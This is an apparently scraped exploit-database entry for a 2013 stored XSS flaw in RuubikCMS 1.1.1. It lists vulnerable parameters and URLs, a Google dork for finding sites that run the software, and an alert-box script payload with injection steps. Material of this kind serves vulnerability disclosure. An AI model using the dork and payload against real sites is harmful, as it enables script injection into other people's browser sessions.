扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 |
# Exploit Title: [ruubikcms v1.1.1 Stored XSS] # Google Dork: [powered by ruubikcms] # Date: [2013-6-5] # Exploit Author: [expl0i13r] # Vendor Homepage: [http://www.ruubikcms.com/] # Software Link: [http://www.ruubikcms.com/ruubikcms/download.php?f=ruubikcms111.zip] # Version: [1.1.1] # Tested on: [Windows 7] # Contact: expl0i13r@gmail.com Description: ------------- RuubikCMS is an open source website content management tool which is designed to be user-friendly for both the end-user and the webmaster. ruubikcms v1.1.1 suffers fromStored XSS vulnerability, when parsing user input to the 'name' parameter via POST method through '/ruubikcms/ruubikcms/cms/index.php'. Attackers can exploit these weaknesses to execute arbitrary HTML and script code in a user's browser session. Tested on : Windows 7 Browsers: Chrome,Internet Explorer, Firefox POC of the vulnerabilities : ----------------------------- Stored XSS Vulnerable URL's ---------------------------- http://127.0.0.1/ruubikcms/ruubikcms/cms/index.php [vulnerable : name] http://127.0.0.1/ruubikcms/ruubikcms/cms/extranet.php?p=member-area [vulnerable : name] http://127.0.0.1/ruubikcms/ruubikcms/cms/sitesetup.php [Vulnerable : name , siteroot] http://127.0.0.1/ruubikcms/ruubikcms/cms/users.php?role=5&p=test[Vulnerable : firstname , lastname] p@yl0ad : "><script>alert('h@cK3d by eXpl0i13r')</script> Example: Pagemanagement > Page name 1. Enter pAyl0ad : "><script>alert('h@cK3d by eXpl0i13r')</script> in: "Page management" > "Page name" textbox 2. Refresh page and click on Free Pages and p0p up will come. 3. Also Click on tab "News" which will load our injected XSS code , it will be available in drop down menu : News > Link to page (optional) # blackpentesters.blogspot.com [2013-6-5] # infotech-knowledge.blogspot.com |
体验盒子
